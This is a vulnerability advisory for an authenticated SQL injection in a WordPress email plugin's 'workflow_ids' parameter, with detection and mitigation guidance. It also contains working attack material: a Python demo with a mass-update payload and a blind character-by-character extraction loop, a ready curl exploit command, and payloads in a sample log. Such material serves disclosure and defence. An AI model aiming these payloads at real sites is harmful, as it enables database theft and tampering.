CVE-2026-1651
Status: Received - Intake
SQL Injection in Email Subscribers Plugin Allows Data Extraction

Publication date: 2026-03-04

Last updated on: 2026-03-04

Assigner: Wordfence

Description
The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the 'workflow_ids' parameter in all versions up to, and including, 5.9.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Meta Information
Generated: 2026-06-16
AI Q&A: 2026-03-04
EPSS Evaluated: 2026-06-15
External references: NVD, EUVD
Affected Vendors & Products (3 associated CPEs)
Vendor    Product             Version / Range
icegram   email_subscribers   up to 5.9.16 (inclusive)
icegram   email_subscribers   up to 5.9.16 (exclusive)
icegram   email_subscribers   5.9.17
CWE ID    Description
CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Executive Summary

The Email Subscribers by Icegram Express WordPress plugin, in all versions up to and including 5.9.16, contains an authenticated SQL injection in the 'workflow_ids' parameter. The parameter is neither adequately escaped nor prepared before it is placed in an SQL query.

The injection point is the update_status function, where 'workflow_ids' is placed directly into an SQL IN clause without validation. The plugin runs the values through esc_sql(), which only backslash-escapes quotes and backslashes. That protects a quoted string literal, but it does nothing for an unquoted numeric list: a value such as 1) OR 1=1 contains no quote, so it passes through esc_sql() untouched and closes the IN list early. The values are also interpolated into the query string before the query is prepared, so preparation cannot bind them as parameters.

An attacker with administrator-level access can use this to append SQL to the existing query and extract sensitive data from the database, such as user credentials, email addresses and plugin secrets. [2]
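To make the mechanism concrete, here is an added model of the bug class in Python against an in-memory SQLite table. It is example code written for this page, not the plugin's own PHP: the table layout, the esc_sql() approximation, the 'rows updated' count used as a blind oracle and the payload strings are all assumptions. The hardened variant mirrors what one %d placeholder per id in $wpdb->prepare() would do.

```python
import sqlite3
from typing import Iterable, List

# Constructed model of the CVE-2026-1651 bug class (not the plugin's code):
# an id list dropped into an unquoted SQL IN (...) after esc_sql()-style
# escaping, run against an in-memory SQLite table.


def esc_sql_like(value: str) -> str:
    """Approximation of WordPress esc_sql(): backslash-escape quotes and
    backslashes. Spaces, parentheses and comment markers pass through, so it
    is no defence when the value lands outside a quoted string."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def fresh_db() -> sqlite3.Connection:
    """Constructed sample data: three workflows and one secret option."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE workflows (id INTEGER PRIMARY KEY, status INTEGER);
        INSERT INTO workflows VALUES (1, 1), (2, 1), (3, 1);
        CREATE TABLE options (option_name TEXT, option_value TEXT);
        INSERT INTO options VALUES ('api_key', 'k7q');
    """)
    return conn


def statuses(conn: sqlite3.Connection) -> List[int]:
    return [r[0] for r in conn.execute("SELECT status FROM workflows ORDER BY id")]


def update_status_vulnerable(conn, workflow_ids: Iterable[str], status: int) -> int:
    """Vulnerable pattern: escape each value, join, interpolate into the IN
    clause before anything is prepared. Returns the number of rows updated."""
    ids = ", ".join(esc_sql_like(w) for w in workflow_ids)
    sql = f"UPDATE workflows SET status = {int(status)} WHERE id IN ({ids})"
    return conn.execute(sql).rowcount


def update_status_safe(conn, workflow_ids: Iterable[str], status: int) -> int:
    """Hardened form: coerce every id to int (anything else raises ValueError)
    and bind through one placeholder per id, like %d placeholders in
    $wpdb->prepare()."""
    ids = [int(w) for w in workflow_ids]
    placeholders = ", ".join("?" for _ in ids)
    sql = f"UPDATE workflows SET status = ? WHERE id IN ({placeholders})"
    return conn.execute(sql, [int(status), *ids]).rowcount


def rejects_non_integer(conn, workflow_ids: Iterable[str]) -> bool:
    """True when the hardened form refuses the input instead of running it."""
    try:
        update_status_safe(conn, workflow_ids, 1)
        return False
    except ValueError:
        return True


def mass_update_attack(conn) -> int:
    """No quotes needed: close the IN list and match every row."""
    return update_status_vulnerable(conn, ["1) OR 1=1 -- "], 0)


def blind_extract(conn, alphabet: str, max_len: int = 16) -> str:
    """Boolean-based blind extraction. The oracle is the row count of the
    UPDATE: it touches row 1 only when the injected predicate is true.
    esc_sql() would mangle quotes, so the predicate uses only numbers
    (UNICODE() here, ORD() in MySQL) and selects the row by rowid."""
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            payload = (f"1) AND (SELECT UNICODE(SUBSTR(option_value, {pos}, 1)) "
                       f"FROM options WHERE rowid = 1) = {ord(ch)} -- ")
            if update_status_vulnerable(conn, [payload], 1) == 1:
                hit = ch
                break
        if hit is None:
            break  # ran off the end of the secret
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = fresh_db()
    print("mass update touched", mass_update_attack(db), "rows ->", statuses(db))
    db = fresh_db()
    print("extracted:", blind_extract(db, "abcdefghijklmnopqrstuvwxyz0123456789"))
    print("hardened rejects payload:", rejects_non_integer(db, ["1) OR 1=1 -- "]))
```

The blind loop is the practical reason an "update status" endpoint leaks data: the attacker never sees query results, only whether the update hit one row or none, and that one bit per request is enough to read any value the database user can SELECT.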

Impact Analysis

An authenticated attacker with administrator privileges can use this flaw to run SQL injection attacks against the site's database and:

- Extract sensitive data such as user password hashes, email addresses and plugin secrets.
- Modify database contents, since the injected predicate sits in the WHERE clause of the update_status query and can be widened to match rows the caller never named.
- Potentially escalate further if combined with another weakness, such as a broken access control check.

Exploitation runs through an AJAX endpoint, so blind techniques apply: boolean-based and time-based payloads can extract data one character per request. [2]

Detection Guidance

Exploitation goes through the WordPress admin AJAX endpoint (normally /wp-admin/admin-ajax.php), so look for authenticated requests to the Email Subscribers plugin's workflows update_status handler whose 'workflow_ids' values are anything other than plain integers. This page identifies the hook as 'wp_ajax_icegram-express' with method 'update_status'; note that admin-ajax.php dispatches the request's action parameter to the wp_ajax_{action} hook, so the value seen on the wire is the hook name without the wp_ajax_ prefix.

A practical check is to capture and inspect requests to admin-ajax.php and flag 'workflow_ids' values containing spaces, parentheses, quotes, comment markers (--, /*) or SQL keywords, since a legitimate value is a list of numeric IDs.

Example commands:

- Finding candidate requests in a web server access log: grep 'admin-ajax.php' /var/log/apache2/access.log | grep 'icegram' | grep 'update_status'. A default access log records only the request line, so this catches parameters sent in the query string only; the plugin's requests are POSTs, and their bodies are visible only in a WAF or ModSecurity audit log or with request-body logging enabled.
- Testing for the vulnerability with curl (requires an authenticated administrator session cookie, plus any nonce the handler checks): curl -X POST --data-urlencode 'action=icegram-express' --data-urlencode 'method=update_status' --data-urlencode 'workflow_ids[]=1) OR 1=1 -- ' -b cookies.txt https://yourwordpresssite.com/wp-admin/admin-ajax.php. Use --data-urlencode rather than -d so the spaces and parentheses in the payload are encoded correctly.

Because exploitation requires administrator-level authentication, focus monitoring on administrator accounts and on AJAX requests that touch the plugin's workflows. [2]
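The value-shape check described above, run over constructed sample records, as an added example that is not part of the original page. The log format (one JSON object per request with the decoded form body, as a reverse proxy or WAF with body capture might emit) is an assumption, as are the user names, timestamps and the action value icegram-express, which is derived from the hook name this page reports; the detector keys only on the workflow_ids parameter so it does not depend on that name being right.

```python
import json
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: one JSON object per request, as a reverse proxy or
# WAF with request-body capture might emit it. Not the format of any real
# product; users, timestamps and payloads are made up for this page.
SAMPLE_LOG = r"""
{"ts": "2026-03-05T10:01:02Z", "user": "alice", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=icegram-express&method=update_status&workflow_ids%5B%5D=12&workflow_ids%5B%5D=13&status=1"}
{"ts": "2026-03-05T10:01:09Z", "user": "alice", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=heartbeat&_nonce=abc123"}
{"ts": "2026-03-05T10:02:44Z", "user": "mallory", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=icegram-express&method=update_status&workflow_ids%5B%5D=1%29+OR+1%3D1+--+&status=0"}
{"ts": "2026-03-05T10:02:51Z", "user": "mallory", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=icegram-express&method=update_status&workflow_ids%5B%5D=1%29+AND+%28SELECT+SLEEP%285%29%29+--+&status=1"}
{"ts": "2026-03-05T10:03:00Z", "user": "bob", "method": "GET", "uri": "/wp-admin/admin-ajax.php?action=icegram-express&method=update_status&workflow_ids%5B%5D=7", "body": ""}
"""

# A legitimate workflow id is digits only.
INTEGER_ID = re.compile(r"\d+")
# Tokens that have no business in a numeric id list; any of them raises severity.
SQL_TOKENS = re.compile(r"(--|/\*|#|[()'\"]|\b(OR|AND|SELECT|UNION|SLEEP|BENCHMARK)\b)", re.I)


def request_params(entry: Dict) -> Dict[str, List[str]]:
    """Merge query-string and form-body parameters. parse_qs decodes %5B%5D
    to [] and + to space, so PHP-style workflow_ids[] keys survive intact."""
    params = parse_qs(urlsplit(entry["uri"]).query, keep_blank_values=True)
    for key, values in parse_qs(entry.get("body", ""), keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    return params


def workflow_ids(params: Dict[str, List[str]]) -> List[str]:
    """Collect values for workflow_ids whether sent as a scalar or as an array."""
    return [v for k, vs in params.items()
            if k == "workflow_ids" or k.startswith("workflow_ids[")
            for v in vs]


def classify(entry: Dict) -> Optional[Dict]:
    """Return a finding when an admin-ajax.php request carries a workflow_ids
    value that is not a plain integer; None otherwise."""
    if not urlsplit(entry["uri"]).path.endswith("/admin-ajax.php"):
        return None
    params = request_params(entry)
    bad = [v for v in workflow_ids(params) if not INTEGER_ID.fullmatch(v.strip())]
    if not bad:
        return None
    return {
        "ts": entry["ts"],
        "user": entry.get("user"),
        "action": params.get("action", [""])[0],
        "method": params.get("method", [""])[0],
        "severity": "high" if any(SQL_TOKENS.search(v) for v in bad) else "medium",
        "values": bad,
    }


def scan(log_text: str) -> List[Dict]:
    """Run classify() over every non-empty line of a JSON-lines log."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        hit = classify(json.loads(line))
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(json.dumps(finding))
```

Keying on the shape of the value rather than on a keyword list is deliberate: the page's own description says the parameter is an id list, so anything that is not digits is already anomalous, and the keyword match only decides how loudly to alert.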

Mitigation Strategies

Update the Email Subscribers plugin to a version later than 5.9.16, where the SQL injection is fixed (the CPE data above lists 5.9.17).

If an update is not immediately possible, limit administrator accounts to trusted users, since exploitation requires administrator-level privileges, and enforce strong authentication on them.

Monitor requests to admin-ajax.php that target the plugin's workflows handler. Do not block admin-ajax.php as a whole, since the rest of the WordPress admin depends on it; filter on the plugin's action and the 'workflow_ids' parameter instead.

Apply Web Application Firewall (WAF) rules that reject 'workflow_ids' values which are not plain integers, which blocks SQL injection attempts against this parameter without disturbing legitimate requests.

Review and audit administrator accounts for suspicious activity and rotate their passwords if compromise is suspected. [2]
